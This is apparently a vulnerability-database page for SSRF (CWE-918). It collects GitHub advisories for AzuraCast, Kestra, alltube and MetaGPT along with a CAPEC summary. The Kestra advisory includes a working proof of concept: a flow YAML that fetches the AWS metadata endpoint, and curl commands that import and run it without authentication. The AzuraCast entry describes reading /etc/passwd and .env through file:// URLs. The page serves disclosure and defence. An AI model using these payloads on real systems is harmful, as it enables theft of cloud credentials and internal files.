CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Vulnerability from github – Published: 2026-09-27 03:31 – Updated: 2026-09-27 03:31AzuraCast before 0.23.8 contains a server-side request forgery and local file read vulnerability in the AutoDJ remote playlist fetch (backend/src/Radio/AutoDJ/QueueBuilder.php, getMediaFromRemoteUrl()). A user with the station Media permission can create or update a playlist with source=remote_url and remote_type=playlist whose remote_url points at a file:// path or an internal/loopback/link-local HTTP endpoint. When AutoDJ builds the queue, the backend passes the user-supplied URL directly to file_get_contents() with no scheme allowlist and no private/loopback/metadata IP policy (PHP allow_url_fopen is enabled by default, including in the Docker image). Lines from the fetched resource are parsed as M3U/PLS entries, stored in StationQueue.autodj_custom_uri, and returned by GET /api/station/{station_id}/queue to any user with the Broadcasting permission, disclosing host files readable by the web container (for example /etc/passwd or the application .env) and the bodies of non-blind internal HTTP requests. No patched version was available at the time of publication.

GHSA-R56G-Q4P6-M3P6
Vulnerability from github – Published: 2026-09-17 17:15 – Updated: 2026-09-17 17:15Summary
The Pebble template engine's http() function in Kestra OSS accepts user-controlled URLs without any validation, allowing Server-Side Request Forgery (SSRF) attacks. An unauthenticated attacker can import a malicious Flow YAML and execute it to access internal services, cloud metadata endpoints (AWS 169.254.169.254), or localhost services. The vulnerability affects all Kestra OSS deployments with default configuration.
Details
The root cause is in core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java (lines 77-106):
- No URL validation: User input is passed directly to
URI.create()with no checks for private IPs, internal hosts, or restricted schemes - No IP filtering: Missing checks for 10.0.0.0/8, 192.168.0.0/16, 169.254.169.254, 127.0.0.1
- No scheme restriction:
file://,gopher://schemes are not blocked - No authentication required:
TenantValidationFilter.javaonly checks tenant == "main" — no authentication - Unconditional registration:
HttpFunctionis registered without any feature flags inExtension.java:180
PoC
Prerequisites:
docker run -d --name kestra-ssrf -p 8080:8080 kestra/kestra:latest server local
sleep 30
Step 1: Create malicious Flow YAML
cat > /tmp/ssrf_poc.yaml << 'YAML'
id: ssrf_metadata
namespace: company.team
tasks:
- id: exfiltrate
type: io.kestra.plugin.core.log.Log
message: |
{{ http(uri='http://169.254.169.254/latest/meta-data/', method='GET') }}
YAML
Step 2: Import without authentication
curl -X POST http://localhost:8080/api/v1/main/flows/import \
-F "fileUpload=@/tmp/ssrf_poc.yaml"
Step 3: Execute the flow
curl -X POST http://localhost:8080/api/v1/main/executions/company.team/ssrf_metadata
Step 4: Verify — the flow execution output contains AWS EC2 metadata (ami-id, instance-type, IAM credentials if available)
Impact
- CVSS 3.1: 8.6 (HIGH) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- CWE: CWE-918 (Server-Side Request Forgery)
- Affected: All Kestra OSS versions (default deployment)
- Impact: Attackers can access internal services, cloud metadata (AWS/GCP/Azure), localhost endpoints, and potentially escalate to cloud credential theft

Vulnerability from github – Published: 2022-03-01 22:01 – Updated: 2022-03-18 20:42Impact
Releases prior to 3.0.2 are vulnerable to a Server-Side Request Forgery vulnerability that allows an attacker to send a request to an internal hostname.
Patches
3.0.2 contains a fix for this vulnerability. (The 1.x and 2.x releases are not maintained anymore.)
Part of the fix requires applying a patch to youtube-dl to prevent it from following HTTP redirects. If you are using the version of youtube-dl bundled with 3.0.2, it is already patched. However, if you are using your own unpatched version of youtube-dl you might still be vulnerable.

"details": "### Impact\nReleases prior to 3.0.2 are vulnerable to a Server-Side Request Forgery vulnerability that allows an attacker to send a request to an internal hostname.\n\n### Patches\n3.0.2 contains a fix for this vulnerability.\n(The 1.x and 2.x releases are not maintained anymore.)\n\nPart of the fix requires applying [a patch](https://github.com/Rudloff/alltube/blob/148a171b240e7ceb076b9e198bef412de14ac55d/patches/youtube-dl-redirect.diff) to youtube-dl to prevent it from following HTTP redirects. If you are using the version of youtube-dl bundled with 3.0.2, it is already patched.\nHowever, if you are using your own unpatched version of youtube-dl **you might still be vulnerable**.\n\n### References\n* https://github.com/Rudloff/alltube/commit/3a4f09dda0a466662a4e52cde674749e0c668e8d\n* https://github.com/Rudloff/alltube/commit/1b099bb9836a3ce7c427a41722a7ab5a3d1c1b2d\n* https://huntr.dev/bounties/9b14cc46-ec08-4940-83cc-9f986b2a5903/\n* https://nvd.nist.gov/vuln/detail/CVE-2022-0768\n* https://github.com/ytdl-org/youtube-dl/issues/30691",

GHSA-R5V8-C28H-F8R8
Vulnerability from github – Published: 2026-04-12 03:30 – Updated: 2026-04-14 20:04A security flaw has been discovered in FoundationAgents MetaGPT up to 0.8.2. This impacts the function decode_image of the file metagpt/utils/common.py. The manipulation of the argument img_url_or_b64 results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.
